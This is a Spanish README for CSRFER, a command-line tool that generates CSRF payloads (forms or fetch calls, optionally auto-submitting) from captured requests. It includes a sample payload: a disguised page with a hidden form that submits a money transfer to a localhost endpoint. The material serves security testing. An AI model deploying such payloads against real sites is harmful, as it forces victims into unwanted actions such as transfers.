
Herramienta para generar payloads CSRF basados en solicitudes vulnerables
_____ _________________ ___________
/ __ \/ ___| ___ \ ___| ___| ___ \
| / \/\ `--.| |_/ / |_ | |__ | |_/ /
| | `--. \ /| _| | __|| /
| \__/\/\__/ / |\ \| | | |___| |\ \
\____/\____/\_| \_\_| \____/\_| \_|
-.--.
) " '-,
',' 2 \_
\q \ . \
_.--' '----.__
/ ._ _.__ \__
_.'_.' \_ .-._\_ '-, }
(,/ _.---;-( . \ \ ~
____ ( .___\_\ \/_/
( '-._ \ \ |
'._ ),> _) >
'-._ c=' Cooo -._
'-._ '.
'-._ `\
snd '-._ '.
'-._ \
`~---'
CSRFER es una herramienta para generar payloads CSRF, basados en solicitudes vulnerables.
Analiza las solicitudes proporcionadas para generar ya sea un formulario o una solicitud fetch. El payload puede luego incrustarse en una plantilla HTML.
npm install -g csrfer
Uso: csrfer [opciones]
Opciones:
--version Muestra el número de versión
-r, --request Ruta al archivo de solicitud a utilizar
-m, --mode Modo para generar el código. Opciones disponibles: form, fetch. (Por defecto es form)
-a, --autosubmit Enviar automáticamente la solicitud al cargar la página
-s, --show Muestra los inputs del formulario (solo para modo form)
-o, --output Guarda el payload en el archivo especificado en lugar de STDOUT
-t, --template Ruta a una página de plantilla HTML. Usa el marcador {{CONTENT}} para especificar dónde
inyectar el código (en HTML, no en JS)
-T, --defaulttemplate Usa esta opción si deseas que el código se inyecte en una página HTML por defecto.
-h, --help Muestra ayuda
Ejemplos:
csrfer -r req.txt -m form -a Envía automáticamente una solicitud de formulario
csrfer -r req.txt -m form -s Genera y muestra un formulario para ser enviado manualmente
csrfer -r req.txt -m fetch -t my_template.html Genera una solicitud fetch y utiliza la plantilla
proporcionada
<!DOCTYPE html>
<html>
<head>
<title>This is Hello World page</title>
</head>
<body>
<h1>Hello World</h1>
<form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50€' /><br><input
type='submit' value='submit'></form>
</body>
</html>
Este proyecto tiene licencia MIT.